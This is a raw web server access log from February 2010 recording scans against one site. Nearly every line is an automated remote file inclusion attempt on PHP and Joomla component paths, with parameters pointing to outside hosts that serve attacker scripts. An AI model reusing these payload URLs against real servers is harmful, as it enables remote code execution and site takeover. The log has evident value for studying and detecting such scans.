123.143.98.5 - - [14/Feb/2010:05:00:51 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:00:51 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:01:00 -0800] "GET /logs/access_100210.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:01:04 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:01:04 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:01:09 -0800] "GET /logs/access_100210.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:01:21 -0800] "GET /logs/access_100210.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [14/Feb/2010:05:01:28 -0800] "GET /logs/access_100104.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [14/Feb/2010:05:01:28 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [14/Feb/2010:05:01:28 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:01:30 -0800] "GET /logs/access_100210.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:01:31 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:01:31 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:02:46 -0800] "GET /logs/access_100210.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:02:46 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:02:50 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:05:03:34 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:05:03:34 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:05:03:34 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:05:03:47 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.109.127.201 - - [14/Feb/2010:05:04:06 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [14/Feb/2010:05:04:06 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [14/Feb/2010:05:04:07 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:05:04:29 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:05:04:29 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:05:04:29 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [14/Feb/2010:05:04:49 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [14/Feb/2010:05:04:49 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [14/Feb/2010:05:04:49 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.109.127.201 - - [14/Feb/2010:05:04:59 -0800] "GET /logs/access_100109.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:05:19 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:05:19 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:05:19 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:05:05:22 -0800] "GET /logs/access_100130.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:05:05:22 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:05:05:22 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:05:05:23 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:05:05:23 -0800] "GET /bbs/write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:05:05:24 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:05:05:26 -0800] "GET /bbs/write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:05:05:26 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:05:05:26 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:05:35 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:05:35 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:05:36 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:05:36 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:05:36 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:05:36 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:05:59 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:05:59 -0800] "GET /logs/access_100130.log//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:06:00 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:06:07 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:06:08 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:06:08 -0800] "GET /logs/access_100130.log//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [14/Feb/2010:05:06:08 -0800] "GET /logs/access_100120.log//registration_detailed.inc.php?mosConfig_absolute_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:06:09 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:06:10 -0800] "GET /logs/access_100130.log//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:05:06:10 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:05:06:12 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:05:06:12 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:05:06:12 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:05:06:39 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:05:06:40 -0800] "GET /logs/access_100130.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:05:06:40 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.191.227.2 - - [14/Feb/2010:05:06:50 -0800] "GET /logs/access_100124.log//include/prodler.class.php?sPath=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:05:06:52 -0800] "GET /logs/access_100123.log%20%20//SSI.php?sourcedir=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:05:06:52 -0800] "GET /logs//SSI.php?sourcedir=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:05:06:52 -0800] "GET /SSI.php?sourcedir=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:05:07:06 -0800] "GET /logs/access_100201.log%20%20//SSI.php?sourcedir=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [14/Feb/2010:05:07:06 -0800] "GET /logs/access_100210.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:05:07:17 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:05:07:19 -0800] "GET /SSI.php?sourcedir=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:05:07:19 -0800] "GET /logs/access_100123.log//SSI.php?sourcedir=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:05:07:19 -0800] "GET /logs//SSI.php?sourcedir=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:05:07:21 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:05:07:22 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:05:07:22 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:05:07:22 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [14/Feb/2010:05:07:36 -0800] "GET /logs/access_100201.log//SSI.php?sourcedir=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [14/Feb/2010:05:07:43 -0800] "GET /logs/access.log//registration_detailed.inc.php?mosConfig_absolute_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [14/Feb/2010:05:09:48 -0800] "GET /logs/access_100108.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [14/Feb/2010:05:09:49 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_100108.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
69.161.133.1 - - [14/Feb/2010:05:09:51 -0800] "GET /logs/access_100210.log//registration_detailed.inc.php?mosConfig_absolute_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [14/Feb/2010:05:09:51 -0800] "GET /logs/access_100205.log//registration_detailed.inc.php?mosConfig_absolute_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:05:10:26 -0800] "GET /logs/access.log///write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:05:10:26 -0800] "GET /logs///write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:05:10:26 -0800] "GET //write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:05:11:05 -0800] "GET /logs///write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:05:11:05 -0800] "GET /logs/access.log%20%20///write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:05:11:05 -0800] "GET //write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:11:29 -0800] "GET /logs/access_100112.log%20%20//e404.php?INCLUDE_FOLDER=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:11:29 -0800] "GET /e404.php?INCLUDE_FOLDER=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:11:29 -0800] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:05:11:41 -0800] "GET /logs/access_100128.log///write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:11:44 -0800] "GET /logs/access_100115.log%20%20//e404.php?INCLUDE_FOLDER=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:13:54 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:13:54 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:13:54 -0800] "GET /logs/access_100210.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:05:14:00 -0800] "GET /logs/access_100210.log%20%20///gnuboard4//bbs/write_comment_update.php//delete_all.php?board_skin_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:05:14:01 -0800] "GET //gnuboard4//bbs/write_comment_update.php//delete_all.php?board_skin_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:05:14:01 -0800] "GET /logs///gnuboard4//bbs/write_comment_update.php//delete_all.php?board_skin_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:05:14:08 -0800] "GET /logs/access_100202.log%20%20///gnuboard4//bbs/write_comment_update.php//delete_all.php?board_skin_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:05:14:29 -0800] "GET /logs/access_100131.log%20%20///gnuboard4//bbs/write_comment_update.php//delete_all.php?board_skin_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:14:37 -0800] "GET /logs/access_100210.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:14:37 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [14/Feb/2010:05:14:37 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [14/Feb/2010:05:15:24 -0800] "GET /logs/access_100202.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.109.127.201 - - [14/Feb/2010:05:16:42 -0800] "GET /logs/access_100127.log//include/prodler.class.php?sPath=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [14/Feb/2010:05:16:43 -0800] "GET /include/prodler.class.php?sPath=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [14/Feb/2010:05:16:44 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [14/Feb/2010:05:18:14 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:05:20:20 -0800] "GET /logs/access_100128.log%20%20///write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:21:45 -0800] "GET /logs/access_100114.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:21:45 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:21:45 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:25:52 -0800] "GET /logs/access_100201.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:26:14 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:26:14 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:26:14 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:26:19 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:05:26:19 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
